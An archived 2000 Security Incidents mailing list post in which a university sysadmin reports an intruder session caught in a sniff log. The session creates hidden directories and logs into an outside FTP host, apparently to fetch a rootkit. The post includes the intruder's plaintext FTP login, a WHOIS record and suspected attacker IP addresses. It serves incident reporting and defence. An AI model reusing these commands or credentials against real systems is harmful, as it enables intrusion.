Security Incidents mailing list archives
rootkit site found in sniff log (??)
From: filipg () CORONA EPS PITT EDU (Filip M. Gieszczykiewicz)
Date: Sun, 9 Jan 2000 05:29:29 -0500
I was looking through the sniff log (only 2 days of data preserved) to
e-mail the sysadmins of probed/cracked sites when I found this:

---------
: ls
: mkdir /^H.a
: mkdir .a
: cd .a
: ftp ftp.xoom.com
USER chrometnt
PASS phorce31337
---------

Smells of a skript-kiddie... falls into his own latrine...

---------
Registrant:
XOOM.com, Inc. (XOOM2-DOM)
   300 Montgomery St., 3rd Floor
   San Francisco, CA 94104

   Domain Name: XOOM.COM

   Administrative Contact, Technical Contact, Zone Cont
      Smith, Dave (DS8987) dave@XOOM.COM
      (415) 288-2500 (FAX) (415) 288-2580
   Billing Contact:
      Administrator, Billing (AB401-ORG) billing@XOOM
      (415) 288-2500
      Fax- (415) 288-2580

   Record last updated on 12-Jul-1999.
   Record created on 03-Dec-1996.
   Database last updated on 8-Jan-2000 12:47:34 EST.

   Domain servers in listed order:

   NAME.ROC.FRONTIERNET.NET   209.130.187.10
   NAME.PHX.FRONTIERNET.NET   206.165.6.10
   NS1.XOOM.COM               206.132.185.58
   NS2.XOOM.COM               206.132.185.59
   NS3.XOOM.COM               206.132.185.199
---------

This was ON another host!! (local to us). I will be sending their full
info into Pitt's security folks and to root@host.

User(s) doing the connecting/cracking:

Name: mel-0511-145.ports.iprimus.net.au
Address: 202.138.39.145

*AND*

Name: mel-0212-234.ports.iprimus.net.au
Address: 203.134.25.234

*AND*

Name: ppp-003.cust20.adl.chariot.net.au
Address: 210.9.20.3

Cheers,
Filip G.

Filip "I'll buy a vowel" Gieszczykiewicz | http://www.repairfaq.org/
(filipg () corona eps pitt edu)
I am the river itself and the leaf floating its currents.
I am steering. I am swept. I am.